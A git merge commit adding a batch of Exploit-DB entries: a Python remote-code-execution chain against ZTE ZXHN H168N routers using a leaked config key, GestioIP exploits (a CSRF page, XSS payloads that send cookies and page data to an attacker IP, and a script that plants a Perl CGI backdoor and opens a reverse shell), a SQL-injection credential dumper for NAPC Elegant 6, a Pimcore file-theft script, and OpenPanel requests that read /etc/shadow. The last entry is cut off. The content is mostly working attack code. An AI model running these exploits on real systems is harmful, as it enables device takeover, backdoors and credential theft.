Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-16 00:01:37 +00:00
commit 3695da6995
15 changed files with 1139 additions and 0 deletions

View file

@ -0,0 +1,331 @@
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(host, port, username, password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"Frm_Logintoken": "",
"action": "login"
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_LogOff": "1",
"IF_LanguageSwitch": "",
"IF_ModeSwitch": ""
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "---------------------------25853724551472601545982946443"
body = (
f"{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "keep-alive",
}
conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def change_log_level(host, port, log_level):
level_map = {
"critical": "2",
"notice": "5"
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_BASICCONIG": "Y",
"LogEnable": "1",
"LogLevel": level_map[log_level],
"ServiceEnable": "0",
"Btn_cancel_LogManagerConf": "",
"Btn_apply_LogManagerConf": "",
"downloadlog": "",
"Btn_clear_LogManagerConf": "",
"Btn_save_LogManagerConf": "",
"Btn_refresh_LogManagerConf": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def change_username(host, port, new_username, old_password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_InstID": "IGD.AU2",
"Right": "2",
"Username": new_username,
"Password": old_password,
"NewPassword": old_password,
"NewConfirmPassword": old_password,
"Btn_cancel_AccountManag": "",
"Btn_apply_AccountManag": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
def clear_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "clearlog"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def refresh_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Refresh"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def trigger_rce(host, port):
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
def rce(cmd):
return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
def pwn(config_key, host, port):
leak_config(host, port)
username, password = decrypt_config(config_key)
login(host, port, username, password)
shellcode = "echo \"pwned\""
payload = rce(shellcode)
change_username(host, port, payload, password)
refresh_log(host, port)
change_log_level(host, port, "notice")
refresh_log(host, port)
trigger_rce(host, port)
clear_log(host, port)
change_username(host, port, username, password)
change_log_level(host, port, "critical")
logout(host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz&LTvz&f^9", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()

View file

@ -0,0 +1,76 @@
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858
### Description
The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
### Prerequisites
The option "Manage - Manage GestioIP - User Management" must be enabled previously.
### Usage
To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
### File: payload.html
#### example: editing user named 'maxi'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->
<iframe name="hiddenFrame"></iframe>
<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="maxi@test.com">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

View file

@ -0,0 +1,56 @@
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50861
### Description
The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.
### Prerequisites
1. Enable "DNS Key" Feature
First, ensure that "Dynamic DNS updates" is enabled in the global configuration:
Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes
This will enable the following menus:
Manage > DNS Keys
Manage > DNS Update User
2. Create a DNS Key Entry
To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, "Admin" and "GestioIP Admin" groups have this permission.
Also, you can configure this permission to any group under:
Manage > User Groups > Manage Sites and Categories
3. Enter payload.
Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.
### Payloads
1 - Test basic XSS
<script>alert("test")</script>
2 - Send data (cookies) to the attacker's server
<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">
3 - Redirect the user to a malicious site
<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">

View file

@ -0,0 +1,58 @@
# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859
### Description
The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.
### Prerequisites
Enable (set to 'yes') the parameter:
Manage > Manage GestioIP > ACL connection management
### Usage
Select: import/export > Import ACLs/ACL Connections
Select: "Connection List"
Select "report only"
Browse to select the file you want to upload.
Click 'upload'
### Payloads
#### 1) html file to upload
<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>
#### 2) js file to exfiltrate data
var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();
response = req1.responseText;
var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);

View file

@ -0,0 +1,34 @@
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50857
### Description
The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.
### Prerequisites
To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:
• Show backuped device configurations (read_device_config_perm)
• Upload device configurations (write_device_config_perm)
• Administrate CM (administrative_cm_perm)
1) vulnerable parameter: `host_id`
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'
2) vulnerable parameter: `stored_config`
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'

View file

@ -0,0 +1,102 @@
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760
import requests
import sys
# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"
# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;
print "<html><body>";
print '<!-- CGI backdoor -->';
if (!$req) {
print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
"""
# Exploit functions
def upload_file(session, file_name, file_data):
"""Uploads the file to the server"""
files = {
'file_name': (None, file_name),
'leases_file': (file_name, file_data)
}
response = session.post(target_url, files=files)
if "OK" not in response.text:
print(f"[!] Error uploading {file_name}.")
sys.exit(1)
return response
def run_command(session, cmd):
"""Execute a command in the server through the vuln"""
url = target_url + '?' + cmd
resp = session.get(url)
print(resp.text)
def backdoor_exists(session):
"""Verifies if backdoor is already uploaded or not"""
response = session.get(target_url + "?whoami")
if "www-data" in response.text:
return True # backdoor already uploaded
return False # backdoor not uploaded yet
if __name__ == '__main__':
with requests.Session() as session:
session.auth = (username, password)
# Verify if backdoor is already uploaded
if not backdoor_exists(session):
print("\n[!] Uploading backdoor...\n")
upload_file(session, 'upload.cgi', backdoor_code)
else:
print("\n[+] Backdoor already uploaded. Continue...\n")
# Execute the reverse shell
print("\n[!] Executing reverse shell...\n")
reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
run_command(session, reverse_shell_cmd)

View file

@ -0,0 +1,189 @@
# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
# Exploit author: hyp3rlinx
import requests,time,re,sys,argparse
#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#UPDATED: Jan 2024 for python3
#TODO: add SSL support
#===============================
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
#SQL INJECTION VULN PARAM --> LoginForm[username]
#================================================
IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False
def vuln_ver_chk():
global IP, PORT
TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
response = requests.get(TARGET)
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content.decode()):
print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
return True
print("[!] Version not vulnerable :(")
return False
def sql_inject_request(SQL):
global IP, PORT
URL = "http://"+IP+":"+PORT+"/elegant6/login"
tmp=""
headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
session = requests.Session()
res = session.post(URL,headers=headers,data=payload)
idx = res.content.decode('utf-8').find('CDbCommand') # Start of SQL Injection Error in response
idx2 = res.content.decode('utf-8').find('key 1') # End of SQL Injection Error in response
return res.content[idx : idx2+3]
#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
global k,j
while j < NUM_INJECTS:
j+=1
if k !=1:
k+=1
return str(j)+','+str(k)
def tidy_up(results):
global CREDS
idx = results.find("'".encode())
if idx != -1:
idx2 = results.rfind("'".encode())
if not CREDS:
return results[idx + 1: idx2 -2]
else:
return results[idx + 2: idx2]
def breach(i):
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
result=""
#Dump Usernames & Passwords
if CREDS:
if i % 2 == 0:
target='username'
else:
target='password'
SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
if result:
result = result.decode()
else:
result = sql_inject_request(SQL)+"\n"
if result:
result = result.decode()
print("[+] Dumping "+str(target)+": "+str(result))
#Dump Tables
if TABLES:
while j < NUM_INJECTS:
nums = inc()
SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL) + "\n"
if result:
print("[+] Dumping Table... " +str(result.decode()))
time.sleep(0.3)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
parser.add_argument("-p", "--port", help="Port, Default is 80")
parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
return parser.parse_args()
def usage():
print("Dump first ten rows of usernames and passwords")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n")
print("\nDump first five rows of database tables and show SQL errors")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n")
exit(0)
def main(args):
global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR
if args.ip_address:
IP=args.ip_address
if args.port:
PORT=args.port
if args.get_tables:
TABLES=True
if args.creds:
CREDS=True
if args.max_injects:
NUM_INJECTS = int(args.max_injects)
if args.show_sql_errors:
SHOW_SQL_ERROR=True
if args.examples:
usage()
if vuln_ver_chk():
for i in range(0, NUM_INJECTS):
breach(i)
time.sleep(0.3)
if __name__=='__main__':
parser = argparse.ArgumentParser()
print("NAPC Elegant 6 Asset Library v6.1.655")
print("Pre-Authorization SQL Injection 0day Exploit")
print("Discovery / eXploit By hyp3rlinx")
print("ApparitionSec\n")
time.sleep(0.5)
if len(sys.argv)== 1:
parser.print_help(sys.stderr)
sys.exit(0)
main(parse_args())

View file

@ -0,0 +1,42 @@
# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
import requests
# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
# Authenticate and get session
session = requests.Session()
login_data = {
"username": USERNAME,
"password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
if "Login successful" in login_response.text:
print("[+] Authenticated successfully.")
# Exploit the downloadAsZip functionality
download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
payload = {
"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
}
download_response = session.post(download_url, data=payload)
if download_response.status_code == 200:
print("[+] Exploit successful. Restricted files downloaded.")
with open("restricted_files.zip", "wb") as f:
f.write(download_response.content)
else:
print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
print("[-] Authentication failed.")

View file

@ -0,0 +1,30 @@
# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search
Document
# Google Dork: N/A
# Date: 1/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
# CVE: CVE-2024-11954
---
### Description:
A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data
Object Classification Store functionality. The vulnerability arises due to
insufficient input sanitization, allowing an authenticated attacker with
access to the classification store to inject malicious JavaScript code.
This code is then executed in the context of other users' browsers when
they view the affected data.
### Proof of Concept (PoC):
1. Log in to the Pimcore backend as a user with access to the Data Object
Classification Store.
2. Navigate to the Classification Store and create or edit a key.
3. Inject the following payload into the key value:
```html
<script>alert('XSS')</script>
4. Save the file and view it in the frontend or backend. The JavaScript
alert will execute, demonstrating the vulnerability.

View file

@ -0,0 +1,80 @@
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537
### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar
### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers
### Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
### View Function ###
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

View file

@ -0,0 +1,23 @@
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

View file

@ -0,0 +1,27 @@
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584
POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
